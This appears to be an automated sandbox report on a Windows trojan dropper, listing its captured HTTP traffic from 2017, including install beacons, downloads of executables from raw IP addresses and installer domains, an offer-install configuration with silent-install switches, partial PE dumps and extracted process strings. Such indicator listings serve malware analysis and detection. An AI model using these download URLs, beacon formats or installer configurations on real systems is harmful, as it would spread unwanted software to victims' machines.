User-Agent: Moz/5.0 (compatible; MSIE 9.0; Win NT 6.1)

Host: d3jx96othz2l8y.cloudfront.net


HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Tue, 29 Aug 2017 22:04:14 GMT

X-Cache: Miss from cloudfront

Via: 1.1 3c2476383ec2dd20b3b952b944a0f17d.cloudfront.net (CloudFront)

X-Amz-Cf-Id: v_E5UV-Ew9uEr6wONgq1noyrAq8Q-cedPeCGJQjVPmnganF1NjOsDQ==

HTTP/1.1 200 OK..Content-Length: 0..Connection: keep-alive..Cache-Cont
rol: private, no-store..Server: Microsoft-IIS/8.5..X-AspNet-Version: 4
.0.30319..X-Powered-By: ASP.NET..Date: Tue, 29 Aug 2017 22:04:14 GMT..
X-Cache: Miss from cloudfront..Via: 1.1 3c2476383ec2dd20b3b952b944a0f1
7d.cloudfront.net (CloudFront)..X-Amz-Cf-Id: v_E5UV-Ew9uEr6wONgq1noyrA
q8Q-cedPeCGJQjVPmnganF1NjOsDQ==......

GET /p.ashx?e=8r06TjbI24l2M5d6UDxIvgE57R1EcxVK2 Pir6kA/Pnpk06wDwkeQhgWiv4aOiGv14njVTgsdKDHRTk7/hDhlbb8KFWJm4qaK4BZS xKOahiuhqO3CGckWGvtwf75JlcpMdVCGxZIut/5j8mABQj/LhXuFqCFv7nVTlTA7N8SCd9rpVF7L2m5voso8xPlhHGo8OVPqrD/WaXHlhgkkBVkg==&action=START&actionparam=ARE:8; C:\Users\"%CurrentUserName%"\AppData\Local\Temp\18d11d6bcfa143319d89ee15d7989e1c\brastub6ab_amobl_inst.exe /S /MAG=AMOBL /SUB=20544 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: d3jx96othz2l8y.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Tue, 29 Aug 2017 22:04:22 GMT

X-Cache: Miss from cloudfront

Via: 1.1 3c2476383ec2dd20b3b952b944a0f17d.cloudfront.net (CloudFront)

X-Amz-Cf-Id: CPYTPBrf9t2o9NLNjG0GihcnZJiXBbVu0cERde0Jv_6UgeIIgkkMeQ==

....

GET /p.ashx?e=8r06TjbI24l2M5d6UDxIvgE57R1EcxVK2 Pir6kA/Pnpk06wDwkeQhgWiv4aOiGv14njVTgsdKDHRTk7/hDhlbb8KFWJm4qaK4BZS xKOahiuhqO3CGckWGvtwf75JlcpMdVCGxZIut/5j8mABQj/LhXuFqCFv7nVTlTA7N8SCd9rpVF7L2m5voso8xPlhHGo8OVPqrD/WaXHlhgkkBVkg==&action=FINISH&actionparam=ARE:8; C:\Users\"%CurrentUserName%"\AppData\Local\Temp\18d11d6bcfa143319d89ee15d7989e1c\brastub6ab_amobl_inst.exe /S /MAG=AMOBL /SUB=20544 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: d3jx96othz2l8y.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Tue, 29 Aug 2017 22:04:22 GMT

X-Cache: Miss from cloudfront

Via: 1.1 3c2476383ec2dd20b3b952b944a0f17d.cloudfront.net (CloudFront)

X-Amz-Cf-Id: jw5TMA_BWjSv-8xcRJDBeOcovy_y5ydH_qpi-ERlPu0gPrbf4tEM4Q==

HTTP/1.1 200 OK..Content-Length: 0..Connection: keep-alive..Cache-Cont
rol: private, no-store..Server: Microsoft-IIS/8.5..X-AspNet-Version: 4
.0.30319..X-Powered-By: ASP.NET..Date: Tue, 29 Aug 2017 22:04:22 GMT..
X-Cache: Miss from cloudfront..Via: 1.1 3c2476383ec2dd20b3b952b944a0f1
7d.cloudfront.net (CloudFront)..X-Amz-Cf-Id: jw5TMA_BWjSv-8xcRJDBeOcov
y_y5ydH_qpi-ERlPu0gPrbf4tEM4Q==..

POST /temptrack/Store HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: 360devtraking.website

Content-Length: 224

Expect: 100-continue

Accept-Encoding: gzip

HTTP/1.1 100 Continue

....

order="/LsQENRBY8s/42Z7hB2hIbbJOrFHSz783Guu2YFsHqg/jPQP1pu3sTGpb0Hj/e8
DguO5h2QIypjgMLA7XWg5QsSYtDcDZTFE9j7whmUXsKoEwslTckai/6OuNScmwY//8 TPy
6kQfO0tNtwz4N0wpffpqT4vGUnSBpQxySy0 f EHe/fJlwUITywYm7gkCHyu5lOnU96cpv
nfMkrwa0K9g=="

HTTP/1.1 200 OK

Server: nginx/1.10.1 (Ubuntu)

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: close

Cache-Control: no-cache

X-RateLimit-Limit: 60

X-RateLimit-Remaining: 59

Date: Tue, 29 Aug 2017 21:57:34 GMT

Content-Encoding: gzip

14........................0..

GET /gib_1_m_baty.exe HTTP/1.1

Host: 132.148.91.227

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx

Date: Tue, 29 Aug 2017 21:57:40 GMT

Content-Type: application/octet-stream

Content-Length: 2538191

Last-Modified: Tue, 29 Aug 2017 00:00:02 GMT

Connection: keep-alive

Keep-Alive: timeout=15

ETag: "59a4ae82-26bacf"

Accept-Ranges: bytes

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........D..W%..W%..
W%..Zw~.B%..ZwA.8%..Zw@.~%..^]2.^%..W%...%....D.S%......V%..RichW%....
......PE..L.....OY.............................F............@.........
..............................@..................................|..d.
..............................X....................................e..
@...............,............................text.....................
.......... ..`.rdata...x.......z..................@..@.data...........
.....z..............@....reloc..X............\..............@..B......
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................h..D..e2..Y.h..D..Y2..Y.h.
.D..M2..Y..f..........U...E..8.u.3.]..P...@..u. .].U...E..V......D.t.V
.A2..Y..^]...U...U..A.;B.u...;.u.3.@..3.]...U...E..U....H.]...U..QQ.u.
...U..u.R.P..........]...U...E.;H.u...;E.u.3.@..3.].....dD..U..Q.u..e.
..O(..Y....eD..E.Q.M..|}...E...].....eD..U..Q.e...}..u..M.h.eD..R}....
.u..u.......E...]....4eD..U..Q.u..e....(..Y....eD..E.Q.M...}...E...]..
.U..V.u.V..'.....E.Y.0t..@.<oQ....@.8oQ.^]...U..Q..E...t..E..E..E..
....j.j.....D...].U.......E...t4.E..E..E..E..E..E..E.P.E.P.E.Pj.j.

<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD+Oyl+0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEFE/uXQ4cLc0QEGNMJMGmf8= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: s2.symcb.com


HTTP/1.1 200 OK

Server: nginx/1.10.2

Content-Type: application/ocsp-response

Content-Length: 1763

content-transfer-encoding: binary

Cache-Control: max-age=531699, public, no-transform, must-revalidate

Last-Modified: Tue, 29 Aug 2017 01:35:56 GMT

Expires: Tue, 5 Sep 2017 01:35:56 GMT

Date: Tue, 29 Aug 2017 21:57:46 GMT

Connection: keep-alive
0..........0..... .....0......0...0.......WI.....L.c=...r..7Z..2017082
9013556Z0s0q0I0... ...................B.>.I.$&.....e......0..C9...3
13..Q?.t8p.4@A.0........20170829013556Z....20170905013556Z0...*.H.....
...........`..O.z`........H....|...?.a..5...}..u^..X"......J....*.zM..
..^..2d...0s..b_....c.*....g....G...T..<...m.w._..I......1.jJB.c...
ya2..DF.za0...A.F..iC.......eL=.!.....)...A.T.....`y........i...A..R@.
CvZ/.....G..,..!.m.q........\ !..m.z(}....eI@.%...n.O........0...0...0
..........^..)......<...T.0...*.H........0..1.0...U....US1.0...U...
.VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1(c) 2006 Ve
riSign, Inc. - For authorized use only1E0C..U...<VeriSign Class 3 P
ublic Primary Certification Authority - G50...161122000000Z..171214235
959Z0..1.0...U....US1.0...U....Symantec Corporation1.0...U....Symantec
 Trust Network1?0=..U...6Symantec Class 3 PCA - G5 OCSP Responder Cert
ificate 50.."0...*.H.............0.............................m..|...
.....1rUZN.b.......t. d......O...NY.lR..k .Q.z.g.4(,...Rp.7...0C.j.)Z.
....... ~..3...x.b.-..... S^0<6...!.(..2}...T.fX}...6...(...1...#..
H..|`.yy.<B.z.q$......u.-..K.!......y..8..--....?.,.[.[...5.e.4....
.D..t.;....).J....\fV..G.........0...0...U.......0.0l..U. .e0c0a..`.H.
..E....0R0&.. .........hXXp://VVV.symauth.com/cps0(.. .......0...http:
//VVV.symauth.com/rpa0...U.%..0... .......0...U...........0... .....0.
.....0"..U....0...0.1.0...U....TGV-OFF-500...U.......WI.....L.c=...r..
7Z0...U.#..0.....e......0..C9...3130...*.H.............<wN..g..<<< skipped >>>

GET /anzhuang.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRUQ5MTJCODE4OUEzRjg1MDAxNEY3OUE5MTZEM0Y0Qzg3RkUyMTg1RjcyMjdFMjZCNzQyN0Y4NENGNThEQjYyNzM5RDQ0NzJBODA1Q0U2MDFCNjQ3MDk3MThFMkRDOThCOTk= HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: jk.yeawindows.com


HTTP/1.1 200 OK

Cache-Control: private

Content-Type: text/html

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Tue, 29 Aug 2017 21:57:41 GMT

Connection: close

Content-Length: 0

GET /download/APSnapdoAMRev HTTP/1.1

Host: install.rgbcjfir.com

Connection: Keep-Alive


HTTP/1.1 302 Found

Cache-Control: private

Content-Type: text/html; charset=utf-8

Location: hXXp://cdn.piytrwd.com/apdata/installers/auto/exe/starter.exe

Server: Microsoft-IIS/8.5

X-AspNetMvc-Version: 5.0

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Tue, 29 Aug 2017 21:56:58 GMT

Content-Length: 178
<html><head><title>Object moved</title></he
ad><body>..<h2>Object moved to <a href="hXXp://cdn.p
iytrwd.com/apdata/installers/auto/exe/starter.exe">here</a>.&
lt;/h2>..</body></html>..HTTP/1.1 302 Found..Cache-Cont
rol: private..Content-Type: text/html; charset=utf-8..Location: http:/
/cdn.piytrwd.com/apdata/installers/auto/exe/starter.exe..Server: Micro
soft-IIS/8.5..X-AspNetMvc-Version: 5.0..X-AspNet-Version: 4.0.30319..X
-Powered-By: ASP.NET..Date: Tue, 29 Aug 2017 21:56:58 GMT..Content-Len
gth: 178..<html><head><title>Object moved</title&
gt;</head><body>..<h2>Object moved to <a href="ht
tp://cdn.piytrwd.com/apdata/installers/auto/exe/starter.exe">here&l
t;/a>.</h2>..</body></html>....

GET /Update/CheckInstallConfig?deviceid=662bd40f-c794-5fc7-424c-6f9ff3eb0b27&distributer=APSnapdoAMRev&channelid=3&barcodeid=50027003&country=UA&encrypt=True HTTP/1.1

Host: updates.utyuytjn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Cache-Control: public, max-age=60

Content-Type: application/json; charset=utf-8

Expires: Tue, 29 Aug 2017 21:58:11 GMT

Last-Modified: Tue, 29 Aug 2017 21:57:11 GMT

Vary: *

Server: Microsoft-IIS/8.5

X-AspNetMvc-Version: 5.0

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Tue, 29 Aug 2017 21:57:11 GMT

Content-Length: 278

[{"Distributer":"APSnapdoAMRev","ChannelID":"*","BarcodeID":"*","Count
ry":"*","Type":"InstallConfig","Version":"1.0.0.0","Name":"","Url":"ht
tp://cdn.ijnewhb.com/apdata/installers/installer/installers-config/sna
pdo-ap/apsnapdoamrev/ic170817.xml","ApName":"Ronzap","RangeStr":""}]HT
TP/1.1 200 OK..Cache-Control: public, max-age=60..Content-Type: applic
ation/json; charset=utf-8..Expires: Tue, 29 Aug 2017 21:58:11 GMT..Las
t-Modified: Tue, 29 Aug 2017 21:57:11 GMT..Vary: *..Server: Microsoft-
IIS/8.5..X-AspNetMvc-Version: 5.0..X-AspNet-Version: 4.0.30319..X-Powe
red-By: ASP.NET..Date: Tue, 29 Aug 2017 21:57:11 GMT..Content-Length: 
278..[{"Distributer":"APSnapdoAMRev","ChannelID":"*","BarcodeID":"*","
Country":"*","Type":"InstallConfig","Version":"1.0.0.0","Name":"","Url
":"hXXp://cdn.ijnewhb.com/apdata/installers/installer/installers-confi
g/snapdo-ap/apsnapdoamrev/ic170817.xml","ApName":"Ronzap","RangeStr":"
"}]..

GET /reportInstallaa.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRUQ5MTJCODE4OUEzRjg1MDAxNEY3OUE5MTZEM0Y0Qzg3RjIxM0Y4NDZGNEQyMzY4NDNDODdDQjlCQkI3QTY3REZENUIyRUNGNDA1NUUxRDMyNkJGQTg5QTUyMDk0MjZGRDRCQjM2QzhCRkJBMDI3OTA0MDM2RjM0Q0ZFRjgxRDgyMjg5MTE4ODg4QUI2MDk5M0U2Q0I4OUY4Q0NFNTY4Q0Q4Qjg3ODRGMUQ5QTAwOUI3OEQ1RjNFRURCQzk0ODUyMjc= HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: jk.yeawindows.com


HTTP/1.1 200 OK

Cache-Control: private

Content-Type: text/html

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Tue, 29 Aug 2017 21:57:40 GMT

Connection: close

Content-Length: 0

GET hXXp://json.fveocylq.net/?adv_id=334&domain=FVEocYlq.net&event=2&ip=52.1.45.42:80&pub_id=542&offer_version=1.8&dotnet=4&osver=6.1&dwb=iexplore&lang=en&w64=0 HTTP/1.1

Host: json.fveocylq.net


HTTP/1.1 200 OK

Server: nginx

Date: Tue, 29 Aug 2017 21:57:42 GMT

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

77a..{.."advID":334,.."primaryOfferInstallPath":"hXXp://198.12.157.55/
ytab_m_1_big.exe",.."secondaryOfferInstallPath":"hXXp://198.12.157.55/
ytab_m_1_big.exe",.."requireUnzip":false,.."requireSuccessInstallCheck
":true,.."requireExitCodeCheck":false,.."successExitCode":0,.."constPa
rams":"/S /kr /site_id=743",.."mappedParams":[...],.."requireRegKeysCh
eck":true,.."regKeysToCheck":[ .."LocalMachine\\SOFTWARE\\Microsoft\\W
indows\\CurrentVersion\\Uninstall\\FF20459C-DA6E-41A7-80BC-8F4FEFD9C57
5",."LocalMachine\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Unins
tall\\6E727987-C8EA-44DA-8749-310C0FBE3C3E",."LocalMachine\\SOFTWARE\\
Microsoft\\Windows\\CurrentVersion\\Uninstall\\E3605470-291B-44EB-8648
-745EE356599A",."LocalMachine\\SOFTWARE\\Wow6432Node\\Microsoft\\Windo
ws\\CurrentVersion\\Uninstall\\FF20459C-DA6E-41A7-80BC-8F4FEFD9C575",.
"LocalMachine\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersi
on\\Uninstall\\6E727987-C8EA-44DA-8749-310C0FBE3C3E",."LocalMachine\\S
OFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\E
3605470-291B-44EB-8648-745EE356599A"..],.."minutesToSleepBeforeInstall
":0,.."preInstallRegCheck": true,.."preInstallRegKeys":  [. ."LocalMac
hine\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\FF20459
C-DA6E-41A7-80BC-8F4FEFD9C575",."LocalMachine\\SOFTWARE\\Microsoft\\Wi
ndows\\CurrentVersion\\Uninstall\\6E727987-C8EA-44DA-8749-310C0FBE3C3E
",."LocalMachine\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninst
all\\E3605470-291B-44EB-8648-745EE356599A",."LocalMachine\\SOFTWAR

<<< skipped >>>

GET /ytab_m_1_big.exe HTTP/1.1

Host: 198.12.157.55

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx

Date: Tue, 29 Aug 2017 21:57:43 GMT

Content-Type: application/octet-stream

Content-Length: 2527456

Last-Modified: Tue, 29 Aug 2017 07:00:03 GMT

Connection: keep-alive

Keep-Alive: timeout=15

ETag: "59a510f3-2690e0"

Accept-Ranges: bytes

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........D..W%..W%..
W%..Zw~.B%..ZwA.8%..Zw@.~%..^]2.^%..W%...%....D.S%......V%..RichW%....
......PE..L....".Y.............................F............@.........
..............................@..................................|..d.
..............................X....................................e..
@...............,............................text.....................
.......... ..`.rdata...x.......z..................@..@.data...........
.....z..............@....reloc..X............\..............@..B......
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................h..D..e2..Y.h..D..Y2..Y.h.
.D..M2..Y..f..........U...E..8.u.3.]..P...@..u. .].U...E..V......D.t.V
.A2..Y..^]...U...U..A.;B.u...;.u.3.@..3.]...U...E..U....H.]...U..QQ.u.
...U..u.R.P..........]...U...E.;H.u...;E.u.3.@..3.].....dD..U..Q.u..e.
..O(..Y....eD..E.Q.M..|}...E...].....eD..U..Q.e...}..u..M.h.eD..R}....
.u..u.......E...]....4eD..U..Q.u..e....(..Y....eD..E.Q.M...}...E...]..
.U..V.u.V..'.....E.Y.0t..@.<oQ....@.8oQ.^]...U..Q..E...t..E..E..E..
....j.j.....D...].U.......E...t4.E..E..E..E..E..E..E.P.E.P.E.Pj.j.

<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_1796_rwx_0014C000_00001000:

%Sjj^

%original file name%.exe_1796_rwx_001E0000_0000B000:

F.aj]

SearchProtocolHost.exe_2696:

.text

`.data

.rsrc

@.reloc

ADVAPI32.dll

ntdll.DLL

KERNEL32.dll

msvcrt.dll

USER32.dll

ole32.dll

OLEAUT32.dll

TQUERY.DLL

MSSHooks.dll

IMM32.dll

SHLWAPI.dll

SrchCollatorCatalogInfo

SrchDSSLogin

SrchDSSPortManager

SrchPHHttp

SrchIndexerQuery

SrchIndexerProperties

SrchIndexerPlugin

SrchIndexerClient

SrchIndexerSchema

Msidle.dll

Failed to get REGKEY_FLTRDMN_MS_TO_IDLE, using default

pfps->psProperty.ulKind is LPWSTR but psProperty.lpwstr is NULL or empty

d:\win7sp1_gdr\enduser\mssearch2\common\utils\crchash.cxx

d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrdmn\fltrdaemon.cxx

d:\win7sp1_gdr\enduser\mssearch2\search\common\include\secutil.hxx

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracerhelpers.h

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp

d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx

RegDeleteKeyW

RegDeleteKeyExW

8%uiP

Invalid parameter passed to C runtime function.

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp

-d-d-d-d-d-d-d-%d

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h

</MSG></TRC>

<MSG>

<ERR> 0xx=

<LOC> %s(%d) </LOC>

tid="0x%x"

pid="0x%x"

tagname="%s"

tagid="0x%x"

el="0x%x"

time="d/d/d d:d:d.d"

logname="%s"

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx

SHELL32.dll

PROPSYS.dll

ntdll.dll

RegCloseKey

RegCreateKeyExW

RegOpenKeyExW

RegQueryInfoKeyW

RegEnumKeyExW

ReportEventW

_amsg_exit

MsgWaitForMultipleObjects

SearchProtocolHost.pdb

2 2(20282|2

4%5S5

Software\Microsoft\Windows Search

https

kernel32.dll

msTracer.dll

msfte.dll

lX-X-X-XX-XXXXXX

SOFTWARE\Microsoft\Windows Search

tquery.dll

%s\%s

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

Windows Search Service

<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>

advapi32.dll

WAPI-MS-Win-Core-LocalRegistry-L1-1-0.dll

winhttp.dll

Software\Microsoft\Windows Search\Tracing

Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported

Software\Microsoft\Windows Search\Tracing\EventThrottleState

<MSG>

<LOC> %S(%d) </LOC>

tagname="%S"

logname="%S"

Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}

.\%s.mui

.\%s\%s.mui

%s\%s.mui

%s\%s\%s.mui

Microsoft Windows Search Protocol Host

7.00.7601.17610 (win7sp1_gdr.110503-1502)

SearchProtocolHost.exe

Windows

7.00.7601.17610

SearchFilterHost.exe_3752:

.text

`.data

.rsrc

@.reloc

ADVAPI32.dll

ntdll.DLL

KERNEL32.dll

msvcrt.dll

USER32.dll

ole32.dll

OLEAUT32.dll

TQUERY.DLL

IMM32.dll

MSSHooks.dll

mscoree.dll

SHLWAPI.dll

d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrhost\bufstm.cxx

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp

RegDeleteKeyW

RegDeleteKeyExW

8%uiP

d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx

Invalid parameter passed to C runtime function.

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp

-d-d-d-d-d-d-d-%d

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx

RegCloseKey

RegCreateKeyExW

RegOpenKeyExW

RegQueryInfoKeyW

RegEnumKeyExW

ReportEventW

_amsg_exit

SearchFilterHost.pdb

version="5.1.0.0"

name="Microsoft.Windows.Search.MSSFH"

<requestedExecutionLevel

3 3(30383|3

kernel32.dll

Software\Microsoft\Windows Search

SOFTWARE\Microsoft\Windows Search

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

Windows Search Service

tquery.dll

advapi32.dll

API-MS-Win-Core-LocalRegistry-L1-1-0.dll

<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>

Software\Microsoft\Windows Search\Tracing

Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported

Software\Microsoft\Windows Search\Tracing\EventThrottleState

<MSG>

<ERR> 0xx=

<LOC> %S(%d) </LOC>

tid="0x%x"

pid="0x%x"

tagname="%S"

tagid="0x%x"

el="0x%x"

time="d/d/d d:d:d.d"

logname="%S"

</MSG></TRC>

Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}

.\%s.mui

.\%s\%s.mui

%s\%s.mui

%s\%s\%s.mui

%s\%s

winhttp.dll

Microsoft Windows Search Filter Host

7.00.7601.17610 (win7sp1_gdr.110503-1502)

SearchFilterHost.exe

Windows

7.00.7601.17610

conhost.exe_3472:

.text

`.data

.rsrc

@.reloc

GDI32.dll

USER32.dll

msvcrt.dll

ntdll.dll

API-MS-Win-Core-LocalRegistry-L1-1-0.dll

KERNEL32.dll

IMM32.dll

ole32.dll

OLEAUT32.dll

PutInputInBuffer: EventsWritten != 1 (0x%x), 1 expected

Invalid message 0x%x

InitExtendedEditKeys: Unsupported version number(%d)

Console init failed with status 0x%x

CreateWindowsWindow failed with status 0x%x, gle = 0x%x

InitWindowsStuff failed with status 0x%x (gle = 0x%x)

InitSideBySide failed create an activation context. Error: %d

GetModuleFileNameW requires more than ScratchBufferSize(%d) - 1.

GetModuleFileNameW failed %d.

Invalid EventType: 0x%x

Dup handle failed for %d of %d (Status = 0x%x)

Couldn't grow input buffer, Status == 0x%x

InitializeScrollBuffer failed, Status = 0x%x

CreateWindow failed with gle = 0x%x

Opening Font file failed with error 0x%x

\ega.cpi

NtReplyWaitReceivePort failed with Status 0x%x

ConsoleOpenWaitEvent failed with Status 0x%x

NtCreatePort failed with Status 0x%x

GetCharWidth32 failed with error 0x%x

GetTextMetricsW failed with error 0x%x

GetSystemEUDCRangeW: RegOpenKeyExW(%ws) failed, error = 0x%x

RtlStringCchCopy failed with Status 0x%x

Cannot allocate 0n%d bytes

|%SWj

O.fBf;

ReCreateDbcsScreenBuffer failed. Restoring to CP=%d

Invalid Parameter: 0x%x, 0x%x, 0x%x

ConsoleKeyInfo buffer is full

Invalid screen buffer size (0x%x, 0x%x)

SetROMFontCodePage: failed to memory allocation %d bytes

FONT.NT

Failed to set font image. wc=x, sz=(%x,%x)

Failed to set font image. wc=x sz=(%x, %x).

Failed to set font image. wc=x sz=(%x,%x)

FullscreenControlSetColors failed - Status = 0x%x

FullscreenControlSetPalette failed - Status = 0x%x

WriteCharsFromInput failed 0x%x

WriteCharsFromInput failed %x

RtlStringCchCopyW failed with Status 0x%x

CreateFontCache failed with Status 0x%x

FTPh

\>.Sj

GetKeyboardLayout

MapVirtualKeyW

VkKeyScanW

GetKeyboardState

UnhookWindowsHookEx

SetWindowsHookExW

GetKeyState

ActivateKeyboardLayout

GetKeyboardLayoutNameA

GetKeyboardLayoutNameW

_amsg_exit

_acmdln

ShipAssert

NtReplyWaitReceivePort

NtCreatePort

NtEnumerateValueKey

NtQueryValueKey

NtOpenKey

NtAcceptConnectPort

NtReplyPort

SetProcessShutdownParameters

GetCPInfo

conhost.pdb

%$%a%b%V%U%c%Q%W%]%\%[%

%<%^%_%Z%T%i%f%`%P%l%g%h%d%e%Y%X%R%S%k%j%

version="5.1.0.0"

name="Microsoft.Windows.ConsoleHost"

<requestedExecutionLevel

name="Microsoft.Windows.ConsoleHost.SystemDefault"

publicKeyToken="6595b64144ccf1df"

name="Microsoft.Windows.SystemCompatible"

version="6.0.0.0"

publicKeyToken="6595b64144ccf1df"

< =$>:>@>

2%2X2

%SystemRoot%

\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\TrueTypeFont

\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\FullScreen

WindowSize

ColorTableu

ExtendedEditkeyCustom

ExtendedEditKey

Software\Microsoft\Windows\CurrentVersion

\ !:=/.<>;|&

%d/%d

cmd.exe

desktop.ini

\console.dll

%d/%d

6.1.7601.17641 (win7sp1_gdr.110623-1503)

CONHOST.EXE

Windows

Operating System

6.1.7601.17641

Setup.exe_2448:

.text

`.rdata

@.data

.rsrc

@.reloc

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

operator

GetProcessWindowStation

USER32.DLL

KERNEL32.dll

USER32.dll

GetCPInfo

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0af7676060534b0ab7c9dbae31d28aae\Setup.exe

<asmv1:assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="hXXp://VVV.w3.org/2001/XMLSchema-instance"><assemblyIdentity version="1.0.0.0" name="hello.world"></assemblyIdentity><trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"><security><requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">

<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS>

<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS>

<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS>

<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS>

2#323?3\3

=#>2>?>\>

8#929?9\9

3#424?4\4

1#525?5\5

<$<(<,<0<

2%2u2

6 6(646|6

KERNEL32.DLL

mscoree.dll

FVEocYlq.net

52.1.45.42:80

sdfCF40.exe_2912_rwx_00390000_00010000:

%0Xf3

conhost.exe_2328:

.text

`.data

.rsrc

@.reloc

GDI32.dll

USER32.dll

msvcrt.dll

ntdll.dll

API-MS-Win-Core-LocalRegistry-L1-1-0.dll

KERNEL32.dll

IMM32.dll

ole32.dll

OLEAUT32.dll

